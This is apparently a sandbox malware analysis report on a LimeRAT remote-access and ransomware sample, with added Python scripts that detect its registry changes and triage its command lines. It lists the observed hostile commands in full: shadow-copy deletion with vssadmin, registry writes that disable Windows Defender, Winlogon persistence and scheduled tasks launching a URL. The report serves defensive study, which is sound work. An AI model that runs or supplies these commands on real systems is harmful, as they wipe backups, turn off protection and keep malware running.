Malware Analysis Report

2024-09-11 10:21

Sample ID: 240619-rvffgasbqh
Target: Client.exe
SHA256: ebf854c44cf0407faa99b0a60ced1b4805c33249cbc0828554cf1aef7b1c1c79
Tags: limerat defense_evasion evasion execution impact persistence ransomware rat trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK Matrix
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

SHA256: ebf854c44cf0407faa99b0a60ced1b4805c33249cbc0828554cf1aef7b1c1c79

Threat Level: Known bad

The file Client.exe was found to be: Known bad.

Malicious Activity Summary

limerat defense_evasion evasion execution impact persistence ransomware rat trojan

Modifies Windows Defender Real-time Protection settings

Contains code to disable Windows Defender

Modifies security service

Modifies WinLogon for persistence

LimeRAT

Limerat family

Deletes shadow copies

Executes dropped EXE

Checks computer location settings

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Hide Artifacts: Hidden Files and Directories

Enumerates physical storage devices

Unsigned PE

Views/modifies file attributes

Scheduled Task/Job: Scheduled Task

Disables Windows logging functionality

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Interacts with shadow copies

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-19 14:30

Signatures

Contains code to disable Windows Defender

(no indicator details recorded)

Limerat family

limerat

Unsigned PE

(no indicator details recorded)

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 14:30

Reported

2024-06-19 14:32

Platform

win10v2004-20240611-en

Max time kernel

126s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

Signatures

Contains code to disable Windows Defender

(no indicator details recorded)

LimeRAT

rat limerat

Modifies WinLogon for persistence

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\Branding\\svchost.exe\"" | C:\Users\Admin\Branding\svchost.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\Branding\\svchost.exe\"" | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A
The Winlogon Shell value is a comma-separated list of programs started for the user at logon. Keeping explorer.exe first leaves the desktop intact while the dropped copy is launched alongside it on every logon (ATT&CK T1547.004). Both the submitted file and the dropped copy write the value.

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A

Modifies security service

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A
Start = 4 is SERVICE_DISABLED: the Windows Security Center service (wscsvc) will not start on the next boot, so the user receives no warning that real-time protection has been turned off.
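Detection logic for the three registry changes above, added here as a worked example and not part of the sandbox output. It runs over a few constructed registry-write events whose value paths and data are copied from the tables (plus two benign controls); the event layout is an assumption standing in for Sysmon Event ID 13 or an EDR registry trace. The Defender policy values and the wscsvc Start value live under HKLM and can only be written by an elevated process, so their presence in the trace also tells you the detonation ran with administrative rights.

```python
"""Registry-write triage for the persistence / defense-evasion keys seen in this report."""
import re
from typing import NamedTuple


class RegEvent(NamedTuple):
    process: str   # image that performed the write
    path: str      # full value path as the sandbox logs it
    data: str      # value data as a string


class Finding(NamedTuple):
    technique: str
    reason: str
    event: RegEvent


# Value paths and data copied from the report; the event tuple layout is an assumption.
CLIENT = r"C:\Users\Admin\AppData\Local\Temp\Client.exe"
DROPPED = r"C:\Users\Admin\Branding\svchost.exe"
HKCU = r"\REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000"
RTP = r"\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
WSCSVC_START = r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start"

SAMPLE_EVENTS = [
    RegEvent(DROPPED, HKCU + r"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell",
             'explorer.exe,"C:\\Users\\Admin\\Branding\\svchost.exe"'),
    RegEvent(CLIENT, RTP + r"\DisableBehaviorMonitoring", "1"),
    RegEvent(CLIENT, RTP + r"\DisableOnAccessProtection", "1"),
    RegEvent(CLIENT, RTP + r"\DisableScanOnRealtimeEnable", "1"),
    RegEvent(CLIENT, WSCSVC_START, "4"),
    # Constructed benign controls: the default shell, and a service left on automatic start.
    RegEvent(r"C:\Windows\explorer.exe",
             HKCU + r"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "explorer.exe"),
    RegEvent(r"C:\Windows\System32\services.exe", WSCSVC_START, "2"),
]

WINLOGON_SHELL = re.compile(r"\\Winlogon\\Shell$", re.IGNORECASE)
DEFENDER_RTP = re.compile(
    r"\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\(Disable\w+)$", re.IGNORECASE)
SERVICE_START = re.compile(r"\\Services\\(\w+)\\Start$", re.IGNORECASE)
SERVICE_DISABLED = "4"                      # SCM Start value meaning SERVICE_DISABLED
WATCHED_SERVICES = {"wscsvc", "windefend", "sense", "mpssvc"}  # security-relevant services


def evaluate(events):
    """Return one Finding per event that matches a persistence or defense-evasion rule."""
    findings = []
    for ev in events:
        if WINLOGON_SHELL.search(ev.path):
            # Shell is a comma-separated list; anything beyond explorer.exe is an extra autostart.
            entries = [e.strip().strip('"').lower() for e in ev.data.split(",") if e.strip()]
            extras = [e for e in entries if e != "explorer.exe"]
            if extras:
                findings.append(Finding("T1547.004", f"Winlogon Shell appends {extras}", ev))
            continue
        m = DEFENDER_RTP.search(ev.path)
        if m and ev.data == "1":
            findings.append(Finding("T1562.001", f"Defender policy {m.group(1)}=1", ev))
            continue
        m = SERVICE_START.search(ev.path)
        if m and m.group(1).lower() in WATCHED_SERVICES and ev.data == SERVICE_DISABLED:
            findings.append(Finding("T1562.001", f"service {m.group(1)} set to SERVICE_DISABLED", ev))
    return findings


def summarize(findings):
    """Technique -> set of responsible processes, for the incident timeline."""
    out = {}
    for f in findings:
        out.setdefault(f.technique, set()).add(f.event.process)
    return out


if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f.technique, f.reason, "<-", f.event.process)
```

The Shell rule deliberately tolerates the default `explorer.exe` on its own and only fires on the extra entries, so it can be left running against a fleet without noise.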

Deletes shadow copies

ransomware defense_evasion impact execution

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\Branding\svchost.exe | N/A

Enumerates connected drives

Description | Indicator | Process | Target
File opened (read-only) | \??\D:, \??\E:, \??\F:, \??\G:, \??\H: (each opened several times, in lower- and upper-case form) | C:\Windows\system32\vssadmin.exe | N/A
The process is vssadmin.exe, not the sample: these opens are the volumes named in the `vssadmin resize shadowstorage /for=<drive>:` invocations listed under Processes, so this signature reflects the shadow-storage tampering rather than separate drive discovery.

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | pastebin.com | N/A | N/A (64 identical rows in the sandbox output, collapsed to one)

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A (2 identical rows)

Enumerates physical storage devices

Disables Windows logging functionality

Scheduled Task/Job: Scheduled Task

persistence execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A (5 identical rows, one per schtasks /create invocation listed under Processes)

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\Branding\svchost.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
(every row appeared twice in the sandbox output; duplicates removed. Each target is a child the process had just launched, so this table is the parent/child tree of the detonation rather than evidence of injection into an unrelated process)
PID 1932 wrote to memory of 1880 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\cmd.exe
PID 1880 wrote to memory of 948 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\attrib.exe
PID 1880 wrote to memory of 3400 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\attrib.exe
PID 1932 wrote to memory of 4556 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 3600 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 2480 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 952 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4284 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 1184 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4444 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4396 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 628 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 1200 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 2836 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4884 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 1960 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\cmd.exe
PID 1932 wrote to memory of 4588 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\cmd.exe
PID 2480 wrote to memory of 1032 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 952 wrote to memory of 804 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 1184 wrote to memory of 3900 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 2836 wrote to memory of 3172 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 4396 wrote to memory of 1292 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 4884 wrote to memory of 3968 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 4588 wrote to memory of 2160 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 1960 wrote to memory of 5036 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 3600 wrote to memory of 2312 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 4444 wrote to memory of 4984 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 1200 wrote to memory of 4068 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 628 wrote to memory of 3304 | N/A | C:\Windows\SYSTEM32\cmd.exe | C:\Windows\system32\vssadmin.exe
PID 1932 wrote to memory of 2756 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\schtasks.exe
PID 1932 wrote to memory of 2268 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\schtasks.exe
PID 1932 wrote to memory of 4456 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\SYSTEM32\schtasks.exe
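The table above is in effect the process tree of the detonation. The script below, an added example rather than part of the report, parses rows in the sandbox's `PID <a> wrote to memory of <b> N/A <parent> <child>` format, drops the duplicated rows, rebuilds the tree and counts which LOLBins ended up as leaves. The sample rows are reconstructed from the table (every row twice, as in the original output); the regex assumes image paths without spaces, which holds for this report but would need quoting rules for a general parser.

```python
"""Rebuild the detonation's process tree from the sandbox's WriteProcessMemory rows."""
import re
from collections import defaultdict

# Image paths copied from the report.
CLIENT = r"C:\Users\Admin\AppData\Local\Temp\Client.exe"
CMD = r"C:\Windows\SYSTEM32\cmd.exe"
ATTRIB = r"C:\Windows\system32\attrib.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
VSSADMIN = r"C:\Windows\system32\vssadmin.exe"
SCHTASKS = r"C:\Windows\SYSTEM32\schtasks.exe"


def _row(ppid, pid, pimg, cimg):
    """One line in the sandbox's signature-table format."""
    return f"PID {ppid} wrote to memory of {pid} N/A {pimg} {cimg}"


# Reconstructed from the signature table; every row appears twice there, so the
# duplicates are reproduced here on purpose to exercise the de-duplication.
_CMD_PIDS = [1880, 3600, 2480, 952, 4284, 1184, 4444, 4396, 628, 1200, 2836, 4884, 1960, 4588]
_VSS = {2480: 1032, 952: 804, 1184: 3900, 2836: 3172, 4396: 1292, 4884: 3968,
        4588: 2160, 1960: 5036, 3600: 2312, 4444: 4984, 1200: 4068, 628: 3304}
_ROWS = ([_row(1932, p, CLIENT, CMD) for p in _CMD_PIDS]
         + [_row(1880, 948, CMD, ATTRIB), _row(1880, 3400, CMD, ATTRIB), _row(1932, 4556, CLIENT, PS)]
         + [_row(c, v, CMD, VSSADMIN) for c, v in _VSS.items()]
         + [_row(1932, p, CLIENT, SCHTASKS) for p in (2756, 2268, 4456)])
SAMPLE_TEXT = "\n".join(r for r in _ROWS for _ in range(2))

# Assumption: image paths contain no spaces (true for every path in this report).
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")


def parse_edges(text):
    """De-duplicated set of (parent_pid, child_pid, parent_image, child_image)."""
    edges = set()
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            edges.add((int(m.group(1)), int(m.group(2)), m.group(3), m.group(4)))
    return edges


def build_tree(edges):
    """children: pid -> sorted child pids; image: pid -> image; roots: pids never seen as a child."""
    children, image = defaultdict(list), {}
    for ppid, pid, pimg, cimg in edges:
        children[ppid].append(pid)
        image.setdefault(ppid, pimg)
        image[pid] = cimg
    for pid in children:
        children[pid].sort()
    all_children = {pid for _, pid, _, _ in edges}
    roots = sorted(p for p in children if p not in all_children)
    return children, image, roots


def render(children, image, pid, depth=0, out=None):
    """Indented text tree, one line per process."""
    out = [] if out is None else out
    out.append("  " * depth + f"{pid} {image[pid]}")
    for c in children.get(pid, []):
        render(children, image, c, depth + 1, out)
    return out


def leaf_images(children, image, root):
    """Count leaf processes by basename: the LOLBins the sample actually drove."""
    counts = defaultdict(int)
    stack = [root]
    while stack:
        p = stack.pop()
        if children.get(p):
            stack.extend(children[p])
        else:
            counts[image[p].rsplit("\\", 1)[-1].lower()] += 1
    return dict(counts)


if __name__ == "__main__":
    ch, im, roots = build_tree(parse_edges(SAMPLE_TEXT))
    for r in roots:
        print("\n".join(render(ch, im, r)))
    print(leaf_images(ch, im, roots[0]))
```

The leaf counts (12 vssadmin, 3 schtasks, 2 attrib, 1 powershell) line up with the Processes list, with one cmd.exe (PID 4284) whose child was not recorded by the sandbox.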

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\attrib.exe | N/A (4 identical rows, one per attrib invocation listed under Processes)

Processes

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\\Branding" & attrib +H +S "C:\Users\Admin\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\\Branding\*" /S /D

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin Delete Shadows /all /quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SYSTEM32\cmd.exe

cmd /c Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadow /for=c: /on=c: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssadmin.exe

Vssadmin delete shadowstorage /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\system32\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "11:10" /sc daily /mo "5" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "21:41" /sc daily /mo "5" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "03:40" /sc daily /mo "2" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "06:27" /sc weekly /mo "2" /d "Wed" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /f /st "17:29" /sc monthly /m "nov" /tn "NUC" /tr "'explorer'https://gsurl.be/kXFX"

C:\Users\Admin\Branding\svchost.exe

"C:\Users\Admin\Branding\svchost.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c attrib +H +S "C:\Users\Admin\\Branding" & attrib +H +S "C:\Users\Admin\\Branding\*" /S /D

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\\Branding"

C:\Windows\system32\attrib.exe

attrib +H +S "C:\Users\Admin\\Branding\*" /S /D
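A triage pass over the command lines listed above, added as an example (it is not the sandbox's own logic). It strips the `cmd /c` wrapper, splits `&`-chained commands and maps each program to the ATT&CK technique the report's signatures already imply: vssadmin delete/resize to Inhibit System Recovery (T1490), `schtasks /create` with a URL in `/tr` to Scheduled Task (T1053.005), `attrib +H +S` inside a user profile to Hidden Files and Directories (T1564.001), and `Get-MpPreference` to Security Software Discovery (T1518.001). Two caveats are encoded: `vssadmin resize shadow` (without `storage`) is not a vssadmin verb, so that invocation fails, while the `resize shadowstorage` 401MB/unbounded pairs are the usual shrink-then-grow trick that makes VSS discard existing snapshots; and because every schtasks call uses `/f` with the same task name `NUC`, each overwrites the previous one and only the last definition to run survives (in the order listed, the monthly one). The last two command lines are constructed benign controls.

```python
"""Classify LOLBin command lines from the Processes section (added triage example)."""
from typing import NamedTuple


class Finding(NamedTuple):
    technique: str
    detail: str
    cmdline: str


TR = "'explorer'https://gsurl.be/kXFX"   # /tr argument copied from the report
# Copied from the Processes list above, plus two constructed benign controls at the end.
SAMPLE_CMDLINES = [
    r'cmd /c attrib +H +S "C:\Users\Admin\\Branding" & attrib +H +S "C:\Users\Admin\\Branding\*" /S /D',
    r'"powershell" Get-MpPreference -verbose',
    r'cmd /c vssadmin Delete Shadows /all /quiet',
    r'cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB',
    r'cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded',
    r'cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB',
    r'cmd /c Vssadmin delete shadowstorage /all /quiet',
    f'schtasks /create /f /st "11:10" /sc daily /mo "5" /tn "NUC" /tr "{TR}"',
    f'schtasks /create /f /st "21:41" /sc daily /mo "5" /tn "NUC" /tr "{TR}"',
    f'schtasks /create /f /st "03:40" /sc daily /mo "2" /tn "NUC" /tr "{TR}"',
    f'schtasks /create /f /st "06:27" /sc weekly /mo "2" /d "Wed" /tn "NUC" /tr "{TR}"',
    f'schtasks /create /f /st "17:29" /sc monthly /m "nov" /tn "NUC" /tr "{TR}"',
    r'cmd /c vssadmin list shadows',                                            # constructed, benign
    r'schtasks /create /tn "Backup" /sc daily /st "02:00" /tr "C:\Tools\backup.exe"',  # constructed, benign
]

KNOWN_VSSADMIN_VERBS = {"add shadowstorage", "create shadow", "delete shadows", "delete shadowstorage",
                        "list providers", "list shadows", "list shadowstorage", "list volumes",
                        "list writers", "resize shadowstorage", "revert shadow"}


def tokenize(cmdline):
    """Whitespace split that keeps double-quoted spans intact and drops the quotes (no escapes, like cmd.exe)."""
    tokens, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def subcommands(cmdline):
    """Peel off 'cmd /c' and split on '&' so each chained program is judged on its own."""
    toks = tokenize(cmdline)
    if len(toks) >= 2 and toks[0].lower() in ("cmd", "cmd.exe") and toks[1].lower() == "/c":
        toks = toks[2:]
    out, cur = [], []
    for t in toks:
        if t == "&":
            if cur:
                out.append(cur)
                cur = []
        else:
            cur.append(t)
    if cur:
        out.append(cur)
    return out


def opt(toks, name):
    """Value following a /name switch (name given lower-case), or None."""
    low = [t.lower() for t in toks]
    i = low.index(name) if name in low else -1
    return toks[i + 1] if 0 <= i < len(toks) - 1 else None


def classify(toks, cmdline):
    prog = toks[0].lower().rsplit("\\", 1)[-1]
    low = [t.lower() for t in toks]
    if prog in ("vssadmin", "vssadmin.exe"):
        verb = " ".join(low[1:3])
        if verb not in KNOWN_VSSADMIN_VERBS:
            return Finding("T1490 (attempted)", f"unknown vssadmin verb '{verb}', command fails", cmdline)
        if verb in ("delete shadows", "delete shadowstorage"):
            return Finding("T1490", f"vssadmin {verb}", cmdline)
        if verb == "resize shadowstorage":
            size = next((t.split("=", 1)[1] for t in low if t.startswith("/maxsize=")), "?")
            return Finding("T1490", f"shadow storage resized to {size} (shrinking evicts snapshots)", cmdline)
    elif prog in ("schtasks", "schtasks.exe") and "/create" in low:
        tr = opt(toks, "/tr") or ""
        if "http://" in tr.lower() or "https://" in tr.lower():
            return Finding("T1053.005", f"task {opt(toks, '/tn')!r} launches a URL: {tr}", cmdline)
    elif prog in ("attrib", "attrib.exe") and "+h" in low and "+s" in low:
        if any(t.lower().startswith("c:\\users\\") for t in toks[1:]):
            return Finding("T1564.001", "hidden+system attributes set inside a user profile", cmdline)
    elif prog in ("powershell", "powershell.exe") and "get-mppreference" in low:
        return Finding("T1518.001", "queries Defender configuration", cmdline)
    return None


def triage(cmdlines):
    return [f for c in cmdlines for toks in subcommands(c) for f in [classify(toks, c)] if f]


def surviving_tasks(cmdlines):
    """schtasks /create /f replaces an existing task with the same /tn, so the last definition wins."""
    tasks = {}
    for c in cmdlines:
        for toks in subcommands(c):
            low = [t.lower() for t in toks]
            if low[0].startswith("schtasks") and "/create" in low:
                tasks[opt(toks, "/tn")] = {"sc": opt(toks, "/sc"), "st": opt(toks, "/st"), "tr": opt(toks, "/tr")}
    return tasks


if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES):
        print(f.technique, "|", f.detail)
    print(surviving_tasks(SAMPLE_CMDLINES))
```

The `/tr` value `'explorer'https://gsurl.be/kXFX` is kept verbatim: the quoting is odd enough that whether the task actually launches the URL depends on how the Task Scheduler parses it, and that is worth testing on a lab host before relying on it for response.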

Network

Country | Destination | Domain | Proto | Count
US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp | 1
NL | 23.62.61.97:443 | www.bing.com | tcp | 1
US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | iplogger.org | udp | 1
US | 104.21.4.208:443 | iplogger.org | tcp | 1
US | 8.8.8.8:53 | ftp.encompossoftware.com | udp | 1
US | 8.8.8.8:53 | 208.4.21.104.in-addr.arpa | udp | 1
US | 64.40.144.30:21 | ftp.encompossoftware.com | tcp | 1
US | 64.40.144.30:34287 | ftp.encompossoftware.com | tcp | 1
US | 8.8.8.8:53 | 30.144.40.64.in-addr.arpa | udp | 1
US | 52.182.143.211:443 | (none) | tcp | 1
US | 8.8.8.8:53 | pastebin.com | udp | 1
US | 172.67.19.24:443 | pastebin.com | tcp | 132
US | 8.8.8.8:53 | www.example.com | udp | 1
US | 93.184.215.14:443 | www.example.com | tcp | 1
US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 14.215.184.93.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp | 1
PL | 93.184.221.240:80 | (none) | tcp | 1
US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp | 1
